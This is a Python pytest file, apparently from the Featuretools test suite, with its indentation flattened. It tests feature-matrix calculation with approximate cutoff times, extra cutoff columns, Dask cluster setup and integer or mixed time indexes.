agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(ft.Feature(agg_feat2, pd_es["sessions"]), pd_es['log'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
assert feature_matrix[dfeat.get_name()].tolist() == [7, 10]
def test_empty_path_approximate_full(pd_es):
pd_es['sessions'].df['customer_id'] = pd.Series([np.nan, np.nan, np.nan, 1, 1, 2], dtype="category")
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
vals1 = feature_matrix[dfeat.get_name()].tolist()
assert (vals1[0] == 0)
assert (vals1[1] == 0)
assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
# todo: do we need to test this situation?
# def test_empty_path_approximate_partial(pd_es):
# pd_es = copy.deepcopy(pd_es)
# pd_es['sessions'].df['customer_id'] = pd.Categorical([0, 0, np.nan, 1, 1, 2])
# agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
# agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
# dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
# times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
# cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
# feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
# pd_es,
# approximate=Timedelta(10, 's'),
# cutoff_time=cutoff_time)
# vals1 = feature_matrix[dfeat.get_name()].tolist()
# assert vals1[0] == 7
# assert np.isnan(vals1[1])
# assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
def test_approx_base_feature_is_also_first_class_feature(pd_es):
log_to_products = DirectFeature(pd_es['products']['rating'], pd_es['log'])
# This should still be computed properly
agg_feat = ft.Feature(log_to_products, parent_entity=pd_es['sessions'], primitive=Min)
customer_agg_feat = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
# This is to be approximated
sess_to_cust = DirectFeature(customer_agg_feat, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([sess_to_cust, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
vals1 = feature_matrix[sess_to_cust.get_name()].tolist()
assert vals1 == [8.5, 7]
vals2 = feature_matrix[agg_feat.get_name()].tolist()
assert vals2 == [4, 1.5]
def test_approximate_time_split_returns_the_same_result(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:07:30'),
pd.Timestamp('2011-04-09 10:07:40')],
'instance_id': [0, 0]})
feature_matrix_at_once = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_df)
divided_matrices = []
separate_cutoff = [cutoff_df.iloc[0:1], cutoff_df.iloc[1:]]
    # Make sure indexes are different.
    # Note that this step is unnecessary and is done only to showcase the issue here.
separate_cutoff[0].index = [0]
separate_cutoff[1].index = [1]
for ct in separate_cutoff:
fm = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=ct)
divided_matrices.append(fm)
feature_matrix_from_split = pd.concat(divided_matrices)
assert feature_matrix_from_split.shape == feature_matrix_at_once.shape
for i1, i2 in zip(feature_matrix_at_once.index, feature_matrix_from_split.index):
assert (pd.isnull(i1) and pd.isnull(i2)) or (i1 == i2)
for c in feature_matrix_from_split:
for i1, i2 in zip(feature_matrix_at_once[c], feature_matrix_from_split[c]):
assert (pd.isnull(i1) and pd.isnull(i2)) or (i1 == i2)
def test_approximate_returns_correct_empty_default_values(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['customers'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['sessions'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-08 11:00:00'),
pd.Timestamp('2011-04-09 11:00:00')],
'instance_id': [0, 0]})
fm = calculate_feature_matrix([dfeat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_df)
assert fm[dfeat.get_name()].tolist() == [0, 10]
# def test_approximate_deep_recurse(pd_es):
# pd_es = pd_es
# agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
# dfeat1 = DirectFeature(agg_feat, pd_es['sessions'])
# agg_feat2 = Sum(dfeat1, pd_es['customers'])
# dfeat2 = DirectFeature(agg_feat2, pd_es['sessions'])
# agg_feat3 = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['products'], primitive=Count)
# dfeat3 = DirectFeature(agg_feat3, pd_es['log'])
# agg_feat4 = Sum(dfeat3, pd_es['sessions'])
# feature_matrix = calculate_feature_matrix([dfeat2, agg_feat4],
# pd_es,
# instance_ids=[0, 2],
# approximate=Timedelta(10, 's'),
# cutoff_time=[datetime(2011, 4, 9, 10, 31, 19),
# datetime(2011, 4, 9, 11, 0, 0)])
# # dfeat2 and agg_feat4 should both be approximated
def test_approximate_child_aggs_handled_correctly(pd_es):
agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
agg_feat_2 = ft.Feature(pd_es['log']['value'], parent_entity=pd_es['customers'], primitive=Sum)
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-08 10:30:00'),
pd.Timestamp('2011-04-09 10:30:06')],
'instance_id': [0, 0]})
fm = calculate_feature_matrix([dfeat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_df)
fm_2 = calculate_feature_matrix([dfeat, agg_feat_2],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_df)
assert fm[dfeat.get_name()].tolist() == [2, 3]
assert fm_2[agg_feat_2.get_name()].tolist() == [0, 5]
def test_cutoff_time_naming(es):
agg_feat = ft.Feature(es['customers']['id'], parent_entity=es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-08 10:30:00'),
pd.Timestamp('2011-04-09 10:30:06')],
'instance_id': [0, 0]})
cutoff_df_index_name = cutoff_df.rename(columns={"instance_id": "id"})
cutoff_df_wrong_index_name = cutoff_df.rename(columns={"instance_id": "wrong_id"})
cutoff_df_wrong_time_name = cutoff_df.rename(columns={"time": "cutoff_time"})
fm1 = calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df)
fm1 = to_pandas(fm1, index='id', sort_index=True)
fm2 = calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df_index_name)
fm2 = to_pandas(fm2, index='id', sort_index=True)
assert all((fm1 == fm2.values).values)
error_text = 'Cutoff time DataFrame must contain a column with either the same name' \
' as the target entity index or a column named "instance_id"'
with pytest.raises(AttributeError, match=error_text):
calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df_wrong_index_name)
time_error_text = 'Cutoff time DataFrame must contain a column with either the same name' \
' as the target entity time_index or a column named "time"'
with pytest.raises(AttributeError, match=time_error_text):
calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df_wrong_time_name)
# TODO: order doesn't match, but output matches
def test_cutoff_time_extra_columns(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed result not ordered')
agg_feat = ft.Feature(es['customers']['id'], parent_entity=es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0],
'label': [True, True, False]},
columns=['time', 'instance_id', 'label'])
fm = calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df)
# check column was added to end of matrix
assert 'label' == fm.columns[-1]
assert (fm['label'].values == cutoff_df['label'].values).all()
def test_cutoff_time_extra_columns_approximate(pd_es):
agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0],
'label': [True, True, False]},
columns=['time', 'instance_id', 'label'])
fm = calculate_feature_matrix([dfeat],
pd_es,
cutoff_time=cutoff_df,
approximate="2 days")
# check column was added to end of matrix
assert 'label' in fm.columns
assert (fm['label'].values == cutoff_df['label'].values).all()
def test_cutoff_time_extra_columns_same_name(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed result not ordered')
agg_feat = ft.Feature(es['customers']['id'], parent_entity=es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0],
'régions.COUNT(customers)': [False, False, True]},
columns=['time', 'instance_id', 'régions.COUNT(customers)'])
fm = calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df)
assert (fm['régions.COUNT(customers)'].values == cutoff_df['régions.COUNT(customers)'].values).all()
def test_cutoff_time_extra_columns_same_name_approximate(pd_es):
agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0],
'régions.COUNT(customers)': [False, False, True]},
columns=['time', 'instance_id', 'régions.COUNT(customers)'])
fm = calculate_feature_matrix([dfeat],
pd_es,
cutoff_time=cutoff_df,
approximate="2 days")
assert (fm['régions.COUNT(customers)'].values == cutoff_df['régions.COUNT(customers)'].values).all()
def test_instances_after_cutoff_time_removed(es):
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
cutoff_time = datetime(2011, 4, 8)
fm = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True)
fm = to_pandas(fm, index='id', sort_index=True)
actual_ids = [id for (id, _) in fm.index] if isinstance(fm.index, pd.MultiIndex) else fm.index
# Customer with id 1 should be removed
assert set(actual_ids) == set([2, 0])
# TODO: Dask and Koalas do not keep instance_id after cutoff
def test_instances_with_id_kept_after_cutoff(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed result not ordered, missing extra instances')
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
cutoff_time = datetime(2011, 4, 8)
fm = calculate_feature_matrix([property_feature],
es,
instance_ids=[0, 1, 2],
cutoff_time=cutoff_time,
cutoff_time_in_index=True)
# Customer #1 is after cutoff, but since it is included in instance_ids it
# should be kept.
actual_ids = [id for (id, _) in fm.index] if isinstance(fm.index, pd.MultiIndex) else fm.index
assert set(actual_ids) == set([0, 1, 2])
# TODO: Fails with Dask
# TODO: Fails with Koalas
def test_cfm_returns_original_time_indexes(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed result not ordered, indexes are lost due to not multiindexing')
agg_feat = ft.Feature(es['customers']['id'], parent_entity=es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0]})
fm = calculate_feature_matrix([dfeat],
es, cutoff_time=cutoff_df,
cutoff_time_in_index=True)
instance_level_vals = fm.index.get_level_values(0).values
time_level_vals = fm.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
def test_cfm_returns_original_time_indexes_approximate(pd_es):
agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
agg_feat_2 = ft.Feature(pd_es['sessions']['id'], parent_entity=pd_es['customers'], primitive=Count)
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0]})
# approximate, in different windows, no unapproximated aggs
fm = calculate_feature_matrix([dfeat], pd_es, cutoff_time=cutoff_df,
cutoff_time_in_index=True, approximate="1 m")
instance_level_vals = fm.index.get_level_values(0).values
time_level_vals = fm.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
# approximate, in different windows, unapproximated aggs
fm = calculate_feature_matrix([dfeat, agg_feat_2], pd_es, cutoff_time=cutoff_df,
cutoff_time_in_index=True, approximate="1 m")
instance_level_vals = fm.index.get_level_values(0).values
time_level_vals = fm.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
# approximate, in same window, no unapproximated aggs
fm2 = calculate_feature_matrix([dfeat], pd_es, cutoff_time=cutoff_df,
cutoff_time_in_index=True, approximate="2 d")
instance_level_vals = fm2.index.get_level_values(0).values
time_level_vals = fm2.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
# approximate, in same window, unapproximated aggs
fm3 = calculate_feature_matrix([dfeat, agg_feat_2], pd_es, cutoff_time=cutoff_df,
cutoff_time_in_index=True, approximate="2 d")
instance_level_vals = fm3.index.get_level_values(0).values
time_level_vals = fm3.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
def test_dask_kwargs(pd_es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
cutoff_time = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(pd_es['log']['value']) > 10
with cluster() as (scheduler, [a, b]):
dkwargs = {'cluster': scheduler['address']}
feature_matrix = calculate_feature_matrix([property_feature],
entityset=pd_es,
cutoff_time=cutoff_time,
verbose=True,
chunk_size=.13,
dask_kwargs=dkwargs,
approximate='1 hour')
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_dask_persisted_es(pd_es, capsys):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
cutoff_time = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(pd_es['log']['value']) > 10
with cluster() as (scheduler, [a, b]):
dkwargs = {'cluster': scheduler['address']}
feature_matrix = calculate_feature_matrix([property_feature],
entityset=pd_es,
cutoff_time=cutoff_time,
verbose=True,
chunk_size=.13,
dask_kwargs=dkwargs,
approximate='1 hour')
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
feature_matrix = calculate_feature_matrix([property_feature],
entityset=pd_es,
cutoff_time=cutoff_time,
verbose=True,
chunk_size=.13,
dask_kwargs=dkwargs,
approximate='1 hour')
captured = capsys.readouterr()
assert "Using EntitySet persisted on the cluster as dataset " in captured[0]
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
class TestCreateClientAndCluster(object):
def test_user_cluster_as_string(self, monkeypatch):
monkeypatch.setattr(utils, "get_client_cluster",
get_mock_client_cluster)
# cluster in dask_kwargs case
client, cluster = create_client_and_cluster(n_jobs=2,
dask_kwargs={'cluster': 'tcp://127.0.0.1:54321'},
entityset_size=1)
assert cluster == 'tcp://127.0.0.1:54321'
def test_cluster_creation(self, monkeypatch):
total_memory = psutil.virtual_memory().total
monkeypatch.setattr(utils, "get_client_cluster",
get_mock_client_cluster)
try:
cpus = len(psutil.Process().cpu_affinity())
except AttributeError:
cpus = psutil.cpu_count()
# jobs < tasks case
client, cluster = create_client_and_cluster(n_jobs=2,
dask_kwargs={},
entityset_size=1)
num_workers = min(cpus, 2)
memory_limit = int(total_memory / float(num_workers))
assert cluster == (min(cpus, 2), 1, None, memory_limit)
# jobs > tasks case
match = r'.*workers requested, but only .* workers created'
with pytest.warns(UserWarning, match=match) as record:
client, cluster = create_client_and_cluster(n_jobs=1000,
dask_kwargs={'diagnostics_port': 8789},
entityset_size=1)
assert len(record) == 1
num_workers = cpus
memory_limit = int(total_memory / float(num_workers))
assert cluster == (num_workers, 1, 8789, memory_limit)
# dask_kwargs sets memory limit
client, cluster = create_client_and_cluster(n_jobs=2,
dask_kwargs={'diagnostics_port': 8789,
'memory_limit': 1000},
entityset_size=1)
num_workers = min(cpus, 2)
assert cluster == (num_workers, 1, 8789, 1000)
def test_not_enough_memory(self, monkeypatch):
total_memory = psutil.virtual_memory().total
monkeypatch.setattr(utils, "get_client_cluster",
get_mock_client_cluster)
# errors if not enough memory for each worker to store the entityset
with pytest.raises(ValueError, match=''):
create_client_and_cluster(n_jobs=1,
dask_kwargs={},
entityset_size=total_memory * 2)
# does not error even if worker memory is less than 2x entityset size
create_client_and_cluster(n_jobs=1,
dask_kwargs={},
entityset_size=total_memory * .75)
def test_parallel_failure_raises_correct_error(pd_es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
cutoff_time = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(pd_es['log']['value']) > 10
error_text = 'Need at least one worker'
with pytest.raises(AssertionError, match=error_text):
calculate_feature_matrix([property_feature],
entityset=pd_es,
cutoff_time=cutoff_time,
verbose=True,
chunk_size=.13,
n_jobs=0,
approximate='1 hour')
def test_warning_not_enough_chunks(pd_es, capsys):
property_feature = IdentityFeature(pd_es['log']['value']) > 10
with cluster(nworkers=3) as (scheduler, [a, b, c]):
dkwargs = {'cluster': scheduler['address']}
calculate_feature_matrix([property_feature],
entityset=pd_es,
chunk_size=.5,
verbose=True,
dask_kwargs=dkwargs)
captured = capsys.readouterr()
pattern = r'Fewer chunks \([0-9]+\), than workers \([0-9]+\) consider reducing the chunk size'
assert re.search(pattern, captured.out) is not None
def test_n_jobs():
try:
cpus = len(psutil.Process().cpu_affinity())
except AttributeError:
cpus = psutil.cpu_count()
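    # n_jobs follows the scikit-learn convention: -1 means all cores, -2 all but one, and so on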
assert n_jobs_to_workers(1) == 1
assert n_jobs_to_workers(-1) == cpus
assert n_jobs_to_workers(cpus) == cpus
assert n_jobs_to_workers((cpus + 1) * -1) == 1
if cpus > 1:
assert n_jobs_to_workers(-2) == cpus - 1
error_text = 'Need at least one worker'
with pytest.raises(AssertionError, match=error_text):
n_jobs_to_workers(0)
# TODO: add dask version of int_es
def test_integer_time_index(int_es):
times = list(range(8, 18)) + list(range(19, 26))
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
cutoff_df = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(int_es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df,
cutoff_time_in_index=True)
time_level_vals = feature_matrix.index.get_level_values(1).values
sorted_df = cutoff_df.sort_values(['time', 'instance_id'], kind='mergesort')
assert (time_level_vals == sorted_df['time'].values).all()
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_integer_time_index_single_cutoff_value(int_es):
labels = [False] * 3 + [True] * 2 + [False] * 4
property_feature = IdentityFeature(int_es['log']['value']) > 10
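    # a plain int, numpy int64, plain float, and numpy float64 should all be accepted as cutoffs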
cutoff_times = [16, pd.Series([16])[0], 16.0, pd.Series([16.0])[0]]
for cutoff_time in cutoff_times:
feature_matrix = calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True)
time_level_vals = feature_matrix.index.get_level_values(1).values
assert (time_level_vals == [16] * 9).all()
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
# TODO: add dask version of int_es
def test_integer_time_index_datetime_cutoffs(int_es):
times = [datetime.now()] * 17
cutoff_df = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(int_es['log']['value']) > 10
error_text = "cutoff_time times must be numeric: try casting via pd\\.to_numeric\\(\\)"
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df,
cutoff_time_in_index=True)
# TODO: add Dask version of int_es
def test_integer_time_index_passes_extra_columns(int_es):
times = list(range(8, 18)) + list(range(19, 23)) + [25, 24, 23]
labels = [False] * 3 + [True] * 2 + [False] * 9 + [False] * 2 + [True]
instances = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 16, 15, 14]
cutoff_df = pd.DataFrame({'time': times,
'instance_id': instances,
'labels': labels})
cutoff_df = cutoff_df[['time', 'instance_id', 'labels']]
property_feature = IdentityFeature(int_es['log']['value']) > 10
fm = calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df,
cutoff_time_in_index=True)
assert (fm[property_feature.get_name()] == fm['labels']).all()
# TODO: add Dask version of int_es
def test_integer_time_index_mixed_cutoff(int_es):
times_dt = list(range(8, 17)) + [datetime(2011, 1, 1), 19, 20, 21, 22, 25, 24, 23]
labels = [False] * 3 + [True] * 2 + [False] * 9 + [False] * 2 + [True]
instances = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 16, 15, 14]
cutoff_df = pd.DataFrame({'time': times_dt,
'instance_id': instances,
'labels': labels})
cutoff_df = cutoff_df[['time', 'instance_id', 'labels']]
property_feature = IdentityFeature(int_es['log']['value']) > 10
error_text = 'cutoff_time times must be.*try casting via.*'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df)
times_str = list(range(8, 17)) + ["foobar", 19, 20, 21, 22, 25, 24, 23]
cutoff_df['time'] = times_str
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df)
times_date_str = list(range(8, 17)) + ['2018-04-02', 19, 20, 21, 22, 25, 24, 23]
cutoff_df['time'] = times_date_str
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df)
    times_int_str = list(range(8, 17)) + ['17', 19, 20, 21, 22, 25, 24, 23]
    cutoff_df['time'] = times_int_str
    # even numeric-looking strings such as '17' are rejected rather than silently cast
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df)
def test_datetime_index_mixed_cutoff(es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[17] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
labels = [False] * 3 + [True] * 2 + [False] * 9 + [False] * 2 + [True]
instances = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 16, 15, 14]
cutoff_df = pd.DataFrame({'time': times,
'instance_id': instances,
'labels': labels})
cutoff_df = cutoff_df[['time', 'instance_id', 'labels']]
property_feature = IdentityFeature(es['log']['value']) > 10
error_text = 'cutoff_time times must be.*try casting via.*'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_df)
times[9] = "foobar"
cutoff_df['time'] = times
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_df)
    times[9] = '2018-04-02 18:50:45.453216'
    cutoff_df['time'] = times
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_df)
times[9] = '17'
cutoff_df['time'] = times
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_df)
def test_string_time_values_in_cutoff_time(es):
times = ['2011-04-09 10:31:27', '2011-04-09 10:30:18']
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 0]})
agg_feature = ft.Feature(es['log']['value'], parent_entity=es['customers'], primitive=Sum)
error_text = 'cutoff_time times must be.*try casting via.*'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([agg_feature], es, cutoff_time=cutoff_time)
# TODO: Dask version fails (feature matrix is empty)
# TODO: Koalas version fails (koalas groupby agg doesn't support custom functions)
def test_no_data_for_cutoff_time(mock_customer):
if mock_customer.dataframe_type != Library.PANDAS.value:
pytest.xfail("Dask fails because returned feature matrix is empty; Koalas doesn't support custom agg functions")
es = mock_customer
cutoff_times = pd.DataFrame({"customer_id": [4],
"time": pd.Timestamp('2011-04-08 20:08:13')})
trans_per_session = ft.Feature(es["transactions"]["transaction_id"], parent_entity=es["sessions"], primitive=Count)
trans_per_customer = ft.Feature(es["transactions"]["transaction_id"], parent_entity=es["customers"], primitive=Count)
features = [trans_per_customer, ft.Feature(trans_per_session, parent_entity=es["customers"], primitive=Max)]
fm = calculate_feature_matrix(features, entityset=es, cutoff_time=cutoff_times)
    # due to the default values for each primitive,
    # count will be 0, but max will be NaN
np.testing.assert_array_equal(fm.values, [[0, np.nan]])
# adding missing instances not supported in Dask or Koalas
def test_instances_not_in_data(pd_es):
last_instance = max(pd_es['log'].df.index.values)
instances = list(range(last_instance + 1, last_instance + 11))
identity_feature = IdentityFeature(pd_es['log']['value'])
property_feature = identity_feature > 10
agg_feat = AggregationFeature(pd_es['log']['value'],
parent_entity=pd_es["sessions"],
primitive=Max)
direct_feature = DirectFeature(agg_feat, pd_es["log"])
features = [identity_feature, property_feature, direct_feature]
fm = calculate_feature_matrix(features, entityset=pd_es, instance_ids=instances)
assert all(fm.index.values == instances)
for column in fm.columns:
assert fm[column].isnull().all()
fm = calculate_feature_matrix(features,
entityset=pd_es,
instance_ids=instances,
approximate="730 days")
assert all(fm.index.values == instances)
for column in fm.columns:
assert fm[column].isnull().all()
def test_some_instances_not_in_data(pd_es):
a_time = datetime(2011, 4, 10, 10, 41, 9) # only valid data
b_time = datetime(2011, 4, 10, 11, 10, 5) # some missing data
c_time = datetime(2011, 4, 10, 12, 0, 0) # all missing data
times = [a_time, b_time, a_time, a_time, b_time, b_time] + [c_time] * 4
cutoff_time = pd.DataFrame({"instance_id": list(range(12, 22)),
"time": times})
identity_feature = IdentityFeature(pd_es['log']['value'])
property_feature = identity_feature > 10
agg_feat = AggregationFeature(pd_es['log']['value'],
parent_entity=pd_es["sessions"],
primitive=Max)
direct_feature = DirectFeature(agg_feat, pd_es["log"])
features = [identity_feature, property_feature, direct_feature]
fm = calculate_feature_matrix(features,
entityset=pd_es,
cutoff_time=cutoff_time)
ifeat_answer = [0, 7, 14, np.nan] + [np.nan] * 6
prop_answer = [0, 0, 1, np.nan, 0] + [np.nan] * 5
dfeat_answer = [14, 14, 14, np.nan] + [np.nan] * 6
assert all(fm.index.values == cutoff_time["instance_id"].values)
for x, y in zip(fm.columns, [ifeat_answer, prop_answer, dfeat_answer]):
np.testing.assert_array_equal(fm[x], y)
fm = calculate_feature_matrix(features,
entityset=pd_es,
cutoff_time=cutoff_time,
approximate="5 seconds")
dfeat_answer[0] = 7 # approximate calculated before 14 appears
dfeat_answer[2] = 7 # approximate calculated before 14 appears
